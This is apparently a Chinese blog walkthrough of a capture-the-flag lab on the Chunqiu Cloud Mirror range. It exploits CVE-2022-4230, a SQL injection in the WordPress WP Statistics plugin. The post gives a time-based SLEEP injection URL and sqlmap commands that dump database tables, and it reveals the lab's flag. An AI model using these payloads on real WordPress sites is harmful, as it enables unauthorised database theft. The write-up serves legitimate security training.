本文章仅供技术交流，本文章遵循GPL-3.0协议，严禁商用，若有引用请标明出处

适用于Kali Linux/多数Linux系统

有关见国家信息安全漏洞库CVE-2022-4230

第一步：

访问春秋云镜靶场链接http://自己在靶场取得的链接/wp-admin/        [clickshow]wordpress登录页面默认都为/wp-admin/[/clickshow]

并使用测试账号登录

第二步：

登录之后访问

http://在靶场取得域名/wp-admin/admin-ajax.php?action=rest-nonce

 

访问后会得到一个随机数

访问

http://域名/wp-json/wp-statistics/v2/metabox?_wpnonce=刚刚取得的随机数&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR

自己替换上述文字

如图发现存在SQL注入漏洞

第三步：

使用burp抓包访问

http://域名/wp-json/wp-statistics/v2/metabox?_wpnonce=随机数&name=words&search_engine=aaa

抓包得到以下数据，保存下来请求准备联动sqlmap，这里我命名为11

[zd-plane title="如何保存抓包的报文"]全选请求下的内容,右键选择"复制到文件"[/zd-plane]

第四步：

打开kali终端

使用命令sql注入查询当前数据库

sqlmap -r 文件保存位置 --batch --current-db

查询到名为"wordpress"的数据库

使用命令查看这个数据库里的表

sqlmap -r 报文保存位置 --batch -D wordpress --tables

此过程可能有点慢，耐心等待即可[zd-plane title="广告：一个人很寂寞？"]

广告：一个人很寂寞，想看二次元女神点这里

[/zd-plane]

查找到flag表单

在flag表单中查找字段

sqlmap -r 报文位置 --batch -D wordpress -T flag --columns

获取字段值就可以拿到flag内容了

sqlmap -r 报文位置  -D wordpress -T flag -C flag --dump

这样就拿到了flag值了

[zd-plane title="最后一步（傻子都会不建议查看）"]

全选flag值，鼠标中键按下复制

flag{07d10525-04d9-4361-a58b-381ec9e2ace7}

最后打开春秋云镜

粘贴flag到输入框

最后点击提交即可攻克此题目

[/zd-plane]

赞助博主